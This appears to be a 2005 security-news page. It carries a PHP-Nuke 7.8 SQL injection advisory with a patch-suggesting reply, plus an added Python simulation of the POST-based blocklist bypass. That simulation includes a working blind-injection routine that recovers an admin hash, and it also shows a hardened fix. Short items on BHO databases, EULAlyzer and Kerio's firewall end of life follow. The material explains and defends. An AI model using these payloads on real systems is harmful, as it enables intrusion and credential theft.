CastleCops ramps up fight against CoolWebSearch/HomeSearch

CastleCops keeps and maintains various databases of malware and legitimate items for browser helper objects, toolbars, startups, services, and ActiveX objects.

Thanks to the collaboration of many Team CastleCops Expert members, CC is frequently among the first to identify and analyze a new emerging pest, and hence to add information on its components to the various lists. We were, for example, the first to spot and categorize a new BHO co-responsible for an all-new version of SpySheriff/PsGuard/SmitFraud, one of the most insidious and prevalent pests around:

/tk6387-hp_tmp_random_char_or_digit.html

CastleCops is also in the process of entering all BHOs pertaining to the notorious CoolWebSearch/HomeSearch parasite variant into its CLSID database. That information powers publicly accessible applications (in addition to researcher-based utilities) such as:

BHODemon
BHOList

The BHO database in its entirety is made available to the public here:

/CLSID.html

[NewAngels Advisory #7]PHP Nuke <= 7.8 Multiple SQL Injections

So there is this advisory that was released:

[NewAngels Advisory #7] PHP Nuke <= 7.8 Multiple SQL Injections
=============================================================================

Software: PHP Nuke 7.8
Type: SQL Injections
Risk: High

Date: Sep. 10 2005
Vendor: PHP-Nuke (phpnuke.org)

Credit:
=======
Robin 'onkel_fisch' Verton from it-security23.net

Description:
============
PHP-Nuke is a news automated system specially designed to be used in Intranets and Internet.
The Administrator has total control of his web site, registered users, and he will have in the hand
a powerful assembly of tools to maintain an active and 100% interactive web site using databases.
[http://www.phpnuke.org/]

Vulnerability:
==============

PHP Nuke 7.8 is prone to multiple SQL injection vulnerabilities.
These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.

In the modules.php

$result = $db->sql_query("SELECT active, view FROM ".$prefix."_modules WHERE title='$name'");

The $name variable is not checked, so you can inject malicious SQL code. In a file which is included we have the following code:

$queryString = strtolower($_SERVER['QUERY_STRING']);
if (stripos_clone($queryString,'%20union%20') OR stripos_clone($queryString,'/*') OR stripos_clone($queryString,'*/union/*') OR stripos_clone($queryString,'c2nyaxb0')) {
    header("Location: index.php");
    die();
}

[…]

if (!ini_get("register_globals")) {
    import_request_variables('GPC');
}

So you can use UNION in a GET var. But because they use register_globals or import_request_variables you can send
the malicious SQL code via POST, so it is not checked if you insert a "union".

http://www.example.com/modules.php POST: name=' OR 1=1/*
will produce an error, while
http://www.example.com/modules.php POST: name=' OR 1=2/*
will only tell you that the requested 'module' is not active, so you can read out the admin password hash via blind injections.

Additionally there are a few SQL injections in the modules.
Here are a few examples:

http://www.example.com/modules.php?name=News&file=article&sid=[SQL] - here the same as above, send this via POST to bypass the 'union' cover

http://www.example.com/modules.php?name=News&file=comments&Reply&pid=[SQL]

http://www.example.com/modules.php?name=News&file=comments&op=Reply&pid=[SQL]

http://www.example.com/modules.php?name=News&file=comments&op=Reply&sid=[SQL]

Greets:
==============
CyberDead, atomic, sirius_
Whole secured-pussy.de Team
Zealots 😀 😀


Of course I'm not thrilled, so I just had to reply:

The $name variable and others like $sid are expected via $_GET and not
$_POST. The proper start to sanitizing the data here is to ensure that
$name is obtained via $_GET and not injected by $_POST, $_COOKIE, or
anything else.

Since you did two things I'm avidly against:

1) no vendor contact information
2) no suggested patches

I wanted to reply and alert folks who run PHP-Nuke and its forks, since
after running a cursory search on some popular PHP-Nuke sites I saw
nothing about this:

http://en.wikipedia.org/wiki/Php-nuke

About the above suggestion.

To be specific, find the modules.php file and check for the first instance
of "$name". An example:

if (isset($name)) {

Prior to that, simply put in such a line:

$name = $_GET['name'];

You're forcing the $name variable to be set by the HTTP GET request,
rather than having a value injected by a cookie or post ($_COOKIE, $_POST
respectively).

The same applies to the rest of the code for other variables.
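To make the mechanism concrete, here is an added example, written for this page and not code from the advisory, from PHP-Nuke or from the reply above, that models both the bypass the advisory describes and the reply's proposed fix, in Python against an in-memory SQLite database. It reproduces the query-string blocklist quoted above, merges GET and POST variables the way import_request_variables('GPC') does, builds the modules query by string concatenation, and then walks a boolean blind injection through the POST body to recover an admin hash. The table and column names (nuke_modules, nuke_authors, aid, pwd), the sample rows and the hash value are constructed for the example; the simulated page answers "module ok" or "module not active" rather than the error/not-active pair the advisory observed, but the oracle works the same way. hardened_modules() goes beyond the reply's $_GET-only fix: it also whitelists the module title and binds it as a query parameter.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlencode

# Constructed stand-in for the PHP-Nuke tables this example needs. Table and
# column names follow PHP-Nuke's nuke_modules / nuke_authors, trimmed to the
# columns used here; the rows and the admin hash are sample values.
ADMIN_HASH = "5f4dcc3b5aa765d61d8327deb882cf99"

def build_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE nuke_modules (title TEXT, active INTEGER, view INTEGER)")
    db.executemany("INSERT INTO nuke_modules VALUES (?, ?, ?)",
                   [("News", 1, 0), ("Forums", 0, 0)])
    db.execute("CREATE TABLE nuke_authors (aid TEXT, pwd TEXT)")
    db.execute("INSERT INTO nuke_authors VALUES (?, ?)", ("admin", ADMIN_HASH))
    return db

# The blocklist PHP-Nuke runs over the raw $_SERVER['QUERY_STRING'] (quoted in the
# advisory); 'c2nyaxb0' is the lowercased base64 of "script".
BLOCKED = ("%20union%20", "/*", "*/union/*", "c2nyaxb0")

def query_string_blocked(query_string):
    qs = query_string.lower()
    return any(token in qs for token in BLOCKED)

def request_vars(query_string, post_body):
    """Mimic import_request_variables('GPC'): GET and POST keys share one
    namespace, so a POSTed 'name' is as good as one in the URL."""
    merged = {}
    for source in (query_string, post_body):
        for key, values in parse_qs(source, keep_blank_values=True).items():
            merged[key] = values[0]
    return merged

def vulnerable_modules(db, query_string="", post_body=""):
    """modules.php as the advisory describes it: blocklist on the query string
    only, $name from any request source, SQL built by string concatenation."""
    if query_string_blocked(query_string):
        return "redirect:index.php"
    name = request_vars(query_string, post_body).get("name", "")
    sql = "SELECT active, view FROM nuke_modules WHERE title='%s'" % name
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        return "sql error"
    if row is None or row[0] != 1:
        return "module not active"
    return "module ok"

HEX = "0123456789abcdef"

def blind_extract(oracle, length=32):
    """Recover the admin hash through the two distinguishable responses, sending
    each probe in the POST body so the query-string blocklist never sees it.
    The probe is anchored on a module known to be active ('News'), so a true
    condition yields 'module ok' and a false one 'module not active'."""
    recovered = ""
    for pos in range(1, length + 1):
        for ch in HEX:
            probe = ("News' AND (SELECT substr(pwd,%d,1) FROM nuke_authors "
                     "WHERE aid='admin')='%s'/*" % (pos, ch))
            if oracle(urlencode({"name": probe})) == "module ok":
                recovered += ch
                break
        else:
            raise RuntimeError("no hex digit matched at position %d" % pos)
    return recovered

MODULE_NAME = re.compile(r"^[A-Za-z0-9_-]+$")

def hardened_modules(db, query_string="", post_body=""):
    """Read $name from the query string only (the reply's suggestion), then go
    two steps further: accept only a plausible module title and bind it as a
    parameter, so neither the request source nor the blocklist is load-bearing."""
    if query_string_blocked(query_string):
        return "redirect:index.php"
    name = parse_qs(query_string, keep_blank_values=True).get("name", [""])[0]
    if not MODULE_NAME.match(name):
        return "module not active"
    row = db.execute("SELECT active, view FROM nuke_modules WHERE title=?",
                     (name,)).fetchone()
    if row is None or row[0] != 1:
        return "module not active"
    return "module ok"

if __name__ == "__main__":
    db = build_db()
    print(vulnerable_modules(db, "name=' OR 1=1/*"))          # redirect:index.php
    print(vulnerable_modules(db, "", "name=' OR 1=1/*"))      # module ok
    print(vulnerable_modules(db, "name=%27+OR+1%3D1%2F%2A"))  # module ok
    print(blind_extract(lambda body: vulnerable_modules(db, "", body)))
    print(hardened_modules(db, "", "name=' OR 1=1/*"))        # module not active
```

Two things the simulation makes visible that restricting $name to $_GET does not address on its own: the blocklist inspects the raw, undecoded query string, so a percent-encoded comment (name=%27+OR+1%3D1%2F%2A) passes it even on GET, and the blocklist knows nothing about the '-- ' and '#' comment forms MySQL also accepts. Forcing the source of $name helps, but only parameter binding, or a strict whitelist of module titles, removes the injection.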

EULAlyzer 1.0 Released – Analyze License Agreements!

General News
Javacool writes: EULAlyzer 1.0 Released!

Analyze license agreements for interesting words and phrases!

End user license agreements (EULAs) are the bane of most computer users. No one wants to read through pages and pages of boring text, and many people skip reading them altogether. But it can be dangerous not to read license agreements – you might miss important information about software or bundled components, plus you have no idea what you could be agreeing to.

But now there’s a way of making that much easier.

EULAlyzer – Making it all easy!

EULAlyzer can analyze license agreements in seconds, and provide a detailed listing of potentially interesting words and phrases. Discover if the software you’re about to install displays pop-up ads, transmits personally identifiable information, uses unique identifiers to track you, or much much more.

The Benefits:

  • Discover potentially hidden behavior about the software you’re going to install

  • Pick up on things you missed when reading license agreements

  • Keep a saved database of the license agreements you view

  • Instant results – super-fast analysis in just a second

When installing software, never just click past the license agreement. Pop it into EULAlyzer, and EULAlyze it!

EULAlyzer Personal is free for personal and educational use.

More information and download: http://www.javacoolsoftware.com/eulalyzer.html

P.S. Want active, automatic protection? Help support the development of this program, and check out EULAlyzer Pro!

KPF: End of Life December 31st 2005

Joshua Thomas from Kerio has announced that Kerio Personal Firewall will reach end of life.

Hello all,

Kerio Technologies has grown into a significant player in both security and messaging markets. We have achieved many accolades, and we have many satisfied customers all over the world.

Kerio now employs over one hundred people in our three offices worldwide. We want to continue to deliver products that you enjoy using. We made a promise to give our customers the best products in their category. And that means implementing some changes in our product strategy.

During the second half of this year, Kerio will be discontinuing two host-based security products from our portfolio – Kerio ServerFirewall and Kerio Personal Firewall.

Kerio Personal Firewall will be discontinued as of December 31, 2005. It will not be available for purchase after this date. Subscriptions will not be renewed. Technical support will be provided to all customers with valid subscriptions until the end of 2006.

Thank you for your support of Kerio.

Cheers,
Joshua Thomas